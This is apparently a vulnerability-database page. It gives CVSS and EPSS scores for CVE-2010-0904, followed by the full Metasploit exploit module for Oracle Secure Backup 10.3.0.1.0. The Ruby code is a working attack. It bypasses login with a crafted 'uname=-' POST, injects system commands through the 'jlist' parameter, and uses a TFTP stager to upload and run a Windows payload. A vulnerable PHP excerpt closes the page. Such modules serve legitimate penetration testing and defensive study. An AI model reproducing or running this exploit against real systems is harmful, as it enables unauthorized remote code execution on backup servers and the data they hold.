CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
EPSS
Percentile
96.0%
This module exploits an authentication bypass vulnerability in login.php. In conjunction with the authentication bypass issue, the ‘jlist’ parameter in property_box.php can be used to execute arbitrary system commands. This module was tested against Oracle Secure Backup version 10.3.0.1.0
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in login.php. In conjunction with the authentication bypass issue,
the 'jlist' parameter in property_box.php can be used to execute
arbitrary system commands.
This module was tested against Oracle Secure Backup version 10.3.0.1.0
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-0904' ],
[ 'OSVDB', '66338' ],
[ 'ZDI', '10-118' ]
# the jlist vector has not been disclosed or has it?
],
'Targets' =>
[
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
]
],
'CmdStagerFlavor' => 'tftp',
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2010-07-13',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])
end
def windows_stager
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
execute_cmdstager({ temp: '.', tftphost: tftphost })
@payload_exe = generate_payload_exe
print_status("Attempting to execute the payload...")
execute_command(@payload_exe)
end
def execute_command(cmd, opts = {})
res = send_request_cgi(
{
'uri' => '/login.php',
'data' => 'attempt=1&uname=-',
'method' => 'POST',
}, 5)
if res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
sessionid = res.get_cookies
data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
send_request_raw(
{
'uri' => '/property_box.php' + data,
'cookie' => sessionid,
'method' => 'GET',
}, 5)
else
print_error("Invalid PHPSESSION token..")
return
end
end
def exploit
unless datastore['CMD'].blank?
print_status("Executing command '#{datastore['CMD']}'")
execute_command(datastore['CMD'])
return
end
case target['Platform']
when 'win'
windows_stager
else
fail_with(Failure::Unknown, 'Target not supported.')
end
handler
end
end
__END__
else if (strcmp($type, "Job") == 0)
{
if (!is_array($objectname))
$objectname = array();
reset($objectname);
while (list(,$oname) = each($objectname))
{
$oname = escapeshellarg($oname);
$jlist = "$jlist $oname";
}
if (strlen($jlist) > 0)
$msg = exec_qr("$rbtool lsjob -lrRLC $jlist");